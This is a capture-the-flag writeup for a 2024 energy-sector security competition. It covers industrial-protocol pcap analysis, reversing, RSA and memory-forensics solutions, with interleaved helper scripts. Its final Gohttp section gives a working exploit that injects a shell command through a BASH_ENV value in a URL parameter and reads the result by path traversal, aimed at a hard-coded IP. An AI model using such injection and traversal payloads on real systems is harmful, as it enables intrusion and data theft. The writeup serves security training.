2024 China Energy Cybersecurity Competition - ① Preliminary Round
Modbus-A
tshark -r a.pcapng -T fields -e modbus.regval_uint16 | sed '/^\s*$/d' > modbus.data.txt
CyberChef: From Decimal
seeyouagain
Repair the PNG with fixpng, which yields flag@abc
Extract the zip with foremost and unzip it; the flag is hidden as base64 (base64 steganography).
easysys
The decoded result was wrong, while debugging the driver gave the correct one. The cause is junk code (花指令) in the middle: call $+5 pushes the address of the following instruction, and pop rbp; add rbp, 8; push rbp; retn then transfers control to 0x14000100E, so the 0E8h byte at 0x14000100D is never executed and only misleads the disassembler.
.text:0000000140001000 push rbp
.text:0000000140001001 call $+5 ; junk code: effectively jumps +5 to the 100E location. The seed is 0x91D
.text:0000000140001006 pop rbp
.text:0000000140001007 add rbp, 8
.text:000000014000100B push rbp
.text:000000014000100C retn
.text:000000014000100C ; ---------------------------------------------------------------------------
.text:000000014000100D db 0E8h
.text:000000014000100E ; ---------------------------------------------------------------------------
.text:000000014000100E pop rbp
.text:000000014000100F mov dword ptr [rsp+2Ch], 91Dh
.text:0000000140001017 retn
from ctypes import *
cdll.msvcrt.srand(0x1BF52) # actually 0x91d
"""
for ( i = 0; i < 36; ++i )
{
  if ( i == 8 || i == 13 || i == 18 || i == 23 )
  {
    *(_BYTE *)(a1 + i) = 45;
  }
  else
  {
    v3 = rand() % 16;
    strcpy(v4, "0123456789abcdef");
    *(_BYTE *)(a1 + i) = v4[v3];
  }
}
"""
def rand_win():
    # call the Windows CRT rand() so the sequence matches MSVC
    return cdll.msvcrt.rand()
lst = [0] * 36
for i in range(36):
    if ( i == 8 or i == 13 or i == 18 or i == 23 ):
        lst[i] = 45  # '-'
    else:
        v3 = rand_win() % 16
        v4 = "0123456789abcdef"
        lst[i] = ord(v4[v3])
print(bytearray(lst))
# flag{989aeeb9-c0ea-1827-1849-db007f2540ee} completely wrong
Loaded the driver directly and debugged it with DebugView
flag{97e45a19-624d-3c47-bc17-57f1c3bcbb26}
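The script above depends on msvcrt through ctypes, so it only runs on Windows. As an added example (mine, not part of the writeup), the MSVC CRT rand() generator, a publicly documented linear congruential generator, is reimplemented in pure Python and fed the seed 0x91D written at .text:000000014000100F in the listing, so the decompiled loop can be replayed on any platform. It models the user-mode CRT only; as the writeup notes, the real flag came from debugging the driver, so the driver's own rand() need not match this sequence.

```python
# Added example: MSVC CRT rand()/srand() modelled in pure Python
# (LCG: state = state * 214013 + 2531011 mod 2^32, output = (state >> 16) & 0x7fff),
# then the UUID-style string generator from the decompiled loop, rebuilt without ctypes.

class MsvcRand:
    """Portable model of Microsoft's C runtime rand()."""

    def __init__(self, seed: int = 1) -> None:
        self.srand(seed)

    def srand(self, seed: int) -> None:
        self.state = seed & 0xFFFFFFFF

    def rand(self) -> int:
        self.state = (self.state * 214013 + 2531011) & 0xFFFFFFFF
        return (self.state >> 16) & 0x7FFF


def gen_uuid_string(seed: int) -> str:
    """Rebuild the 36-character output of the decompiled loop: a hyphen at
    positions 8, 13, 18 and 23, a hex digit chosen by rand() % 16 everywhere else."""
    rng = MsvcRand(seed)
    digits = "0123456789abcdef"
    out = []
    for i in range(36):
        if i in (8, 13, 18, 23):
            out.append("-")
        else:
            out.append(digits[rng.rand() % 16])
    return "".join(out)


if __name__ == "__main__":
    # 0x91D is the seed stored at .text:000000014000100F in the listing above.
    print("flag{" + gen_uuid_string(0x91D) + "}")
```

With seed 1 the model returns 41, 18467, 6334, ... , the well-known MSVC sequence, which is the quickest way to confirm it matches the Windows CRT before trusting it with another seed.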
Goose
Traffic filter
goose.allData == 4
Extract the last byte of each
84 86 112 88 82 48 78 97 77 122 78 78 84 108 74 72 83 48 53 75 86 69 99 48 78 69 82 78 84 85 112 87 84 85 49 90 82 69 100 79 87 108 82 72 83 106 90 82 80 84 48 57 80 81 61 61
Transcode (From Decimal) + base64
flag{cbe5378615c03732}
IP找不到了 (The IP can't be found)
Following the hint about the dual NICs, analyse the packets
Filter for the largest HTTP packet (/diag.htm) and follow the stream
【2nd IP-Addr: 172.16.129.0】
flag{172.16.129.0}
FINS protocol analysis
Analyse the Omron request packet given in the challenge
46494e530000001b000000020000000080000200 64 00 00 fc 00 40 0102 31 00 00 00 00 01 01
64 / fc: server and client node addresses
40: service ID (SID)
0102 is the command code [memory area write]
31 ... 0101: area code and address number
From the known traffic, the response to a write command is end code 0000
Construct the reply packet
flag{46494e53000000160000000200000000c0000200fc000064004001020000}
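The reply construction done programmatically, as an added example (not the writeup's own code). It parses the FINS/TCP frame from the challenge into its fields, then builds the response the way the FINS header rules require: response bit set in ICF (0x80 becomes 0xC0), destination and source addresses swapped, SID and command code echoed, and a 2-byte end code appended, with the FINS/TCP length field recomputed.

```python
import struct

FINS_MAGIC = b"FINS"
FINS_TCP_COMMAND_FRAME = 2  # FINS/TCP command field used for both command and response frames

# Omron request captured in the challenge (hex copied from the writeup above).
REQUEST_HEX = "46494e530000001b000000020000000080000200640000fc0040010231000000000101"


def parse_fins_tcp(frame: bytes) -> dict:
    """Split a FINS/TCP frame into the TCP header and the 10-byte FINS header fields."""
    magic, length, command, error = struct.unpack(">4sIII", frame[:16])
    if magic != FINS_MAGIC:
        raise ValueError("missing FINS magic")
    if length != len(frame) - 8:
        raise ValueError("length field does not match frame size")
    fins = frame[16:]
    names = ["ICF", "RSV", "GCT", "DNA", "DA1", "DA2", "SNA", "SA1", "SA2", "SID"]
    header = dict(zip(names, fins[:10]))
    return {"command": command, "error": error, "header": header,
            "cmd_code": fins[10:12], "params": fins[12:]}


def build_fins_reply(request: bytes, end_code: int = 0x0000) -> bytes:
    """Build the response frame for a FINS command: set the response bit in ICF,
    swap destination and source, echo SID and command code, append the end code
    (0000 = normal completion)."""
    req = parse_fins_tcp(request)
    h = req["header"]
    reply_header = bytes([
        h["ICF"] | 0x40,                 # 0x80 command -> 0xC0 response
        h["RSV"], h["GCT"],
        h["SNA"], h["SA1"], h["SA2"],    # destination = the requester's source
        h["DNA"], h["DA1"], h["DA2"],    # source = the node that was addressed
        h["SID"],                        # service ID echoed unchanged
    ])
    body = reply_header + req["cmd_code"] + struct.pack(">H", end_code)
    tcp_header = struct.pack(">4sIII", FINS_MAGIC, 8 + len(body), FINS_TCP_COMMAND_FRAME, 0)
    return tcp_header + body


if __name__ == "__main__":
    req = bytes.fromhex(REQUEST_HEX)
    print(" ".join(f"{k}={v:02x}" for k, v in parse_fins_tcp(req)["header"].items()))
    print(build_fins_reply(req).hex())
```

The length check in parse_fins_tcp is worth keeping in any FINS tooling: the length field counts everything after itself, so a frame whose field disagrees with its size is either truncated or crafted.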
Structured data classification and grading identification - A
Filter and clean the data
MD5 the result to get the flag
找到钥匙 (Find the key)
Open the jpg in 010 Editor and find n and e
foremost carves out flag.enc, which is c
import gmpy2
from Crypto.Util.number import bytes_to_long, long_to_bytes
# ciphertext c: the bytes of flag.enc carved out by foremost
h = bytes.fromhex('115F379D944F55823043AA824FF13F51BA73E632B4F93BE44A0C467FE51B25B4')
c = bytes_to_long(h)
# modulus n found in the jpg with 010 Editor
n = 0x80C23546F66C490FAB718322666B3AD9C5D31C4D4BDA4C1D783FC73FB4115253
# yafu ***factors found**
p = 336864880216429367305541498622715085359
q = 172885878211796787522220685199694830877
e = 65537
assert n == p * q
phi = (p - 1) * (q - 1)
t = gmpy2.gcd(e, phi)
assert t == 1  # e must be invertible modulo phi
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))
# flag{ed22321e9ae1ca8}
PLC
Manual calculation --
Manual calculation: (5678 & 7896) << 3 = 45120; reinterpreted as an INT that is -20416. Use 20416 when decrypting.
# python
import numpy as np
print(np.array(45120).astype('int16'))  # -20416
# c
printf("%d", (short)45120); // -20416
Simulation --
Install Schneider Unity Pro XL 8, simulate and run it; this gives -20416.
Decrypt the RC4 at https://www.sojson.com/encrypt_rc4.html to get the flag
U2FsdGVkX196pWxlPoR49+G/eJXJcKqLOruhqNiHzQ==
flag{uddi40lkg}
Value range of WORD and INT in a PLC: W#16#0000 ~ W#16#FFFF
In decimal:
WORD: 0 to 65535.
INT: -32768 to +32767.
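Both halves of this challenge without the online tools, as an added example that is not part of the writeup: the WORD-to-INT reinterpretation is done with struct (the same two's-complement reading numpy's int16 cast performs), and the RC4 ciphertext above is handled with a small RC4 plus the OpenSSL EVP_BytesToKey derivation. Two things are assumptions: that the site's "U2FsdGVkX1..." output is the CryptoJS OpenSSL-compatible "Salted__" envelope with a 32-byte RC4 key (CryptoJS's RC4 keySize), and that the passphrase is the 20416 the writeup says it used; the conversion and the RC4 core are checked against fixed values, the blob decrypt is only printed.

```python
import base64
import hashlib
import struct


# --- WORD <-> INT reinterpretation (the "manual calculation" step) ---

def word_to_int(word: int) -> int:
    """Reinterpret a 16-bit PLC WORD (0..65535) as a signed INT (-32768..32767)."""
    return struct.unpack("<h", struct.pack("<H", word & 0xFFFF))[0]


def int_to_word(value: int) -> int:
    """Inverse of word_to_int: the raw 16-bit pattern behind a signed INT."""
    return struct.unpack("<H", struct.pack("<h", value))[0]


def plc_expression() -> int:
    """(5678 & 7896) << 3, read back as an INT the way the PLC logic does."""
    return word_to_int((5678 & 7896) << 3)


# --- RC4 with the CryptoJS/OpenSSL "Salted__" envelope ---

def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def evp_bytes_to_key(password: bytes, salt: bytes, key_len: int) -> bytes:
    """OpenSSL EVP_BytesToKey with MD5 and one iteration, as CryptoJS's passphrase
    mode uses: D_i = MD5(D_{i-1} || password || salt), concatenated until key_len."""
    derived, block = b"", b""
    while len(derived) < key_len:
        block = hashlib.md5(block + password + salt).digest()
        derived += block
    return derived[:key_len]


def decrypt_salted_rc4(blob_b64: str, passphrase: str) -> bytes:
    """Decrypt a base64 'Salted__' blob from a CryptoJS-style RC4 tool.
    Assumption: key length 32 bytes (CryptoJS RC4 keySize), no IV for a stream cipher."""
    raw = base64.b64decode(blob_b64)
    if raw[:8] != b"Salted__":
        raise ValueError("not an OpenSSL-style salted envelope")
    salt, body = raw[8:16], raw[16:]
    key = evp_bytes_to_key(passphrase.encode(), salt, 32)
    return rc4(key, body)


if __name__ == "__main__":
    print(plc_expression())       # -20416
    print(int_to_word(-20416))    # 45120
    # Blob from the writeup; passphrase 20416 is the value the writeup says it used (assumption).
    blob = "U2FsdGVkX196pWxlPoR49+G/eJXJcKqLOruhqNiHzQ=="
    print(decrypt_salted_rc4(blob, "20416"))
```

The RC4 core is checked against the standard test vector (key "Key", plaintext "Plaintext" gives bbf316e8d940af0ad3); the envelope holds 8 bytes of magic, 8 bytes of salt and then the ciphertext, which for this blob is 15 bytes, the length of flag{uddi40lkg}.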
decproj
Behinder (冰蝎) traffic decryption. The key is the MD5 of 123456 (its first 16 hex characters): e10adc3949ba59ab
Challenge1_enc.bak
Challenge1_enc.dvb
Challenge1_enc.dvl
Challenge1_enc.ecam
Challenge1_enc.eiptag
Challenge1_enc.etg
Challenge1_enc.ini
Challenge1_enc.inivals
Challenge1_enc.isp
Challenge1_enc.opcuatag
Challenge1_enc.pnt
Challenge1_enc.SRbitExistedInProg
The configuration project was extracted from packet no. 2919: https://wwi.lanzoup.com/ilal01wlpu1g
Information gathering points to the Delta PLC software ISPSoft. After opening it, the next step was to recover the project password. I couldn't find a way, so I reversed it directly and got d3ltaplc.
Submit the flag in the format the instructions specify.
browser
Carve flag.zip with R-Studio, or simply by searching for the PK signature; alternatively, vol filescan lists a file named key, which is in fact flag.zip.
https://www.cnblogs.com/Arthurian/p/13830381.html The default browser is recorded under Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
volatility -f browser.raw --profile=Win7SP1x64 printkey -K "Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice"> kkk.txt
Values:
REG_SZ Progid : (S) Tor-Browser-v2.51
The password is Tor-Browser-v2.51
flag{e3ed8aa2-68d4-4cc8-a664-1f3fd8136325}
testjava
Just read this: https://mp.weixin.qq.com/s/PC7oYeLmMgxLWmawRQAF4g
easy_re-A
UPX was modified and I couldn't restore it, so I just attached a debugger. (I saw some people simply brute-forced the XOR in CyberChef.)
Key comparison
00007FF761DF10C9 | 8B4424 20 | mov eax,dword ptr ss:[rsp+20] | rsp+20 counter
00007FF761DF10CD | FFC0 | inc eax |
00007FF761DF10CF | 894424 20 | mov dword ptr ss:[rsp+20],eax |
00007FF761DF10D3 | 837C24 20 26 | cmp dword ptr ss:[rsp+20],26 | 26:'&'
00007FF761DF10D8 | 7D 25 | jge easy_iot.upx.7FF761DF10FF |
00007FF761DF10DA | 48:634424 20 | movsxd rax,dword ptr ss:[rsp+20] |
00007FF761DF10DF | 48:8D0D 1AAF0100 | lea rcx,qword ptr ds:[7FF761E0C000] | holds the ciphertext
00007FF761DF10E6 | 0FB60401 | movzx eax,byte ptr ds:[rcx+rax] |
00007FF761DF10EA | 48:634C24 20 | movsxd rcx,dword ptr ss:[rsp+20] |
00007FF761DF10EF | 0FB64C0C 30 | movzx ecx,byte ptr ss:[rsp+rcx+30] |
00007FF761DF10F4 | 83F1 62 | xor ecx,62 | XOR with 0x62
00007FF761DF10F7 | 3BC1 | cmp eax,ecx |
00007FF761DF10F9 | 74 02 | je easy_iot.upx.7FF761DF10FD |
00007FF761DF10FB | EB 02 | jmp easy_iot.upx.7FF761DF10FF |
00007FF761DF10FD | EB CA | jmp <easy_iot.upx.ii> |
a = bytes.fromhex('04 0E 03 05 19 26 50 53 51 23 52 20 56 21 27 54 56 55 52 56 51 57 51 21 57 56 55 54 52 20 24 24 55 5A 57 26 5B 1F ')
for c in a:
    print(chr(0x62 ^ c), end='')
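The CyberChef XOR brute-force mentioned above, written out in code as an added example (not from the writeup). With a single-byte key the first ciphertext byte pins the key down once a known prefix such as flag{ is assumed, so the search returns exactly one hit; a printable-output filter is included as the fallback for when no prefix is known, which is what CyberChef's brute-force view lets you eyeball.

```python
# Ciphertext bytes copied from the listing above (the 38 bytes at 7FF761E0C000).
CIPHERTEXT = bytes.fromhex(
    "04 0E 03 05 19 26 50 53 51 23 52 20 56 21 27 54 56 55 52 56"
    "51 57 51 21 57 56 55 54 52 20 24 24 55 5A 57 26 5B 1F"
)


def xor_single(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte (the inverse of itself)."""
    return bytes(b ^ key for b in data)


def brute_force_xor(data: bytes, known_prefix: bytes = b"flag{") -> list:
    """Try all 256 single-byte keys; keep (key, plaintext) pairs whose output
    starts with the expected prefix."""
    hits = []
    for key in range(256):
        pt = xor_single(data, key)
        if pt.startswith(known_prefix):
            hits.append((key, pt))
    return hits


def printable_candidates(data: bytes) -> list:
    """Fallback when no prefix is known: keys whose output is entirely printable ASCII."""
    return [k for k in range(256)
            if all(0x20 <= b < 0x7F for b in xor_single(data, k))]


if __name__ == "__main__":
    for key, pt in brute_force_xor(CIPHERTEXT):
        print(f"key=0x{key:02x} -> {pt.decode('ascii')}")
    print("printable under keys:", [hex(k) for k in printable_candidates(CIPHERTEXT)])
```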
Gohttp
https://mp.weixin.qq.com/s/wOddOgJLRdyqK2d2LmV8Hw
import requests

def encode(text):
    from urllib.parse import quote
    string_to_encode = text
    return quote(string_to_encode)

data = encode('cat /home/ctf/flag')
response = requests.get(f"http://101.230.70.253:25875/syncData?ApiUrl=PATH%3a%3aBASH_ENV%3d'$({data}>+/tmp/3.txt)'")
print(response.text)
res = requests.get('http://101.230.70.253:25875/?tpl=../../../../../tmp/3.txt')
print(res.text)